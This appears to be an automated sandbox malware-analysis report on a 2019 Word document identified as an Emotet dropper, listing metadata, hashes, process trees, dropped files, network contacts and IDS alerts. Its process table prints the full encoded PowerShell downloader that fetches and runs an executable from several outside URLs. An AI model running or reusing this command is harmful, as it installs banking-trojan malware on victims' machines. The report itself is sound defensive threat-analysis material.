File name: | 55233404 2019.doc |
Full analysis: | https://app.any.run/tasks/cc0d19f8-3e48-4bc4-978b-9e88aefcd8b5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 13:29:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Customer, Subject: Intranet, Author: Angelita Dickinson, Keywords: navigate, Comments: streamline, Template: Normal.dotm, Last Saved By: Tanya Olson, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 07:30:00 2019, Last Saved Time/Date: Wed Oct 9 07:30:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0 |
MD5: | D79778B3D978AA058FB6B2C539E2E87E |
SHA1: | 6C596024CB90ED0CD4994974A86CD00A89E5A960 |
SHA256: | 3AB0D7EEC7EF409F9BBEBC3A5F3082EB2A2AB2C802BF3D283451376BEEF3C328 |
SSDEEP: | 6144:4Qc46uhMDYhLkI07NSU4jJnrATfD1BrS4uhU5zueLEkFhE:4Qc4eDEX07NSU4VEP1I4ukFS |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Zboncak |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 198 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Altenwerth, Veum and Armstrong |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 170 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:09 06:30:00 |
CreateDate: | 2019:10:09 06:30:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Tanya Olson |
Template: | Normal.dotm |
Comments: | streamline |
Keywords: | navigate |
Author: | Angelita Dickinson |
Subject: | Intranet |
Title: | Customer |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3184 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\55233404 2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2572 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADQAMAA0ADYAMAA0ADMAMAAwADAAPQAnAGIANwAyAHgANQA5ADQAMQB4ADAANwAnADsAJABiADAANQAzAHgAMAA1ADgAMAA0AHgAIAA9ACAAJwA5ADkAMwAnADsAJABiADUANgA4ADQAeAB4ADcANwAxADAAMwA9ACcAYwA3AGMANwA0ADAAMgAwADMAMAAwADIAMAAnADsAJABiAGIANABjAGIAMAB4AHgAMwAwADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIAMAA1ADMAeAAwADUAOAAwADQAeAArACcALgBlAHgAZQAnADsAJABiADEANABjADMAMAAwADMAYwA1ADAAPQAnAGMAYgBjAGMAMgA2ADIANQA4AHgANwA2ADMAJwA7ACQAYwAwADkANQAzAGMAeAAwADMAMABjADAANgA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAYwAwADAANAAyADYAMwAwADIAYgAyAD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGkAbgBrAHQAbwBiAGUAaABhAHAAcAB5AC4AYwBvAG0ALwBnAHQAeAB2AHkAcwAvADMAMAAyADAAMQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgBvAG4AdgBpAGUAcwAuAGMAbwBtAC8AcAByAGUAaQBzAGkAbgBmAG8ALwBwADcAOQA4ADQANgAvAEAAaAB0AHQAcABzADoALwAvAHAAYQByAGkAcwBoAGEAZAB0AG8AZABhAHkALgBjAG8AbQAvADEAYwBtADEANQByAC8AeABvAGcANgAyAGUAaAA5ADgAMwAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwByAGcAYQBuAGkAegBlAHIAcwBvAG4AZABlAG0AYQBuAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBtADcAMQA5ADYAOQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbABpAG4AZABhAHMAYQBtAHMAbwBuAC4AYwBvAG0ALwB2AGoAaABvAHEAeAAvAG4ANAA2ADcANQA5AC8AJwAuACIAUwBwAGwAYABJAHQAIgAoACcAQAAnACkAOwAkAGIAMABiADIAYwAzAHgAMAA1AGMAYwA9ACcAeAB4AGIANQA4ADMAMAAxADAAMAB4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABiADQAMwBjADgANQA1ADAAYgAzADQANQAgAGkAbgAgACQAYwAwADAANAAyADYAMwAwADIAYgAyACkAewB0AHIAeQB7ACQAYwAwADkANQAzAGMAeAAwADMAMABjADAANgAuACIAZABvAHcAYABOAGwAbwBhAEQARgBpAGAAbABFACIAKAAkAGIANAAzAGMAOAA1ADUAMABiADMANAA1ACwAIAAkAGIAYgA0AGMAYgAwAHgAeAAzADAANAApADsAJABjADAAYwAwADgAMAAyADkAOQA0ADMAOQA9ACcAYwBjADgAMABjADcAMQAxADgAMABiADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABiAGIANABjAGIAMAB4AHgAMwAwADQAKQAuACIAbABFAG4AYABnAFQAaAAiACAALQBnAGUAIAAyADAANQA5ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAFQAIgAoACQAYgBiADQAYwBiADAAeAB4ADMAMAA0ACkAOwAkAGMAMABiAHgANgA4AGIAMAA4ADUAYwA4ADMAPQAnAGMAMAA3ADkAMABiAGIAMAAwADcANAA1ACcAOwBiAHIAZQBhAGsAOwAkAGMAMAAwADcAMAAwADQAMQA4ADUAMAA9ACcAeAA1AHgAMAAwADAAMAAxADMAMwAyADkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAeAAyADUAYwBjADAANwAwADkAMQB4ADYANgA9ACcAeABiADAAYgAwAGIAMwAwADcANgA5ADMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2172 | "C:\Users\admin\993.exe" | C:\Users\admin\993.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2656 | --c440da71 | C:\Users\admin\993.exe | 993.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2584 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 993.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
1088 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
1652 | "C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe" | C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe | — | msptermsizes.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3000 | --72acc59c | C:\Users\admin\AppData\Local\msptermsizes\yqdfjuv9ikmkoxv6a.exe | YQDfJUV9iKmkoXV6a.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
996 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | yqdfjuv9ikmkoxv6a.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3164 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | msptermsizes.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD21.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2572 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF0T3YDSC4GP9NPLQL77.temp | — | |
MD5:— | SHA256:— | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFE837EE.wmf | wmf | |
MD5:D7E4638D3EA569A56E0EFFCD2347BD94 | SHA256:3923F9AEA5771D0553E988052E0B6BB6B87A8F54B1756C067CDE8E9F409F5A27 | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B44611264EC284D32C6F03431D7E5BE3 | SHA256:0192F2DD6D16F697830849EDB9A6606BC784A7DAF4C85D366F70128064A606F5 | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6D7637FCFC19C4EBB24C88780E0DDF2F | SHA256:6154E11CA5F0A23371E735F7EBC610B7406BA64E350B0BE253C589A608579EE2 | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80879C3D.wmf | wmf | |
MD5:57CCFA70FBFF60B7B3DBDB1D52D81FB5 | SHA256:5EF5E4109A675336EBC9EF3A8E9193913341C449FB71FA30E0D3D63E0EC057F4 | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$233404 2019.doc | pgc | |
MD5:7FC0C2119E51482C272C28B5290506E5 | SHA256:178A2B26CC240C9141831977EEF0A55D4AE3CB20DB2D9043B7CA225662E9A32D | |||
1088 | msptermsizes.exe | C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe | executable | |
MD5:BADA3BF01142A56B6D2C33764C2405D1 | SHA256:E6630ADFC5882BE333236FD4DA6B8FB8C86866B4768B7914FA9102A3DE3BC3B0 | |||
2572 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091 | SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F | |||
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFC1DF06.wmf | wmf | |
MD5:E8F729A41F234E0F91FAC5DBD195EA40 | SHA256:D1807EA2C463A817C58B6C194EFFE8B77B1E94CCBC8C68A8BFF520C4BFF2E633 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2572 | powershell.exe | 23.229.230.168:443 | thinktobehappy.com | GoDaddy.com, LLC | US | unknown |
1088 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
2572 | powershell.exe | 35.236.132.124:443 | www.bonvies.com | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
thinktobehappy.com |
| unknown |
www.bonvies.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1088 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
1088 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |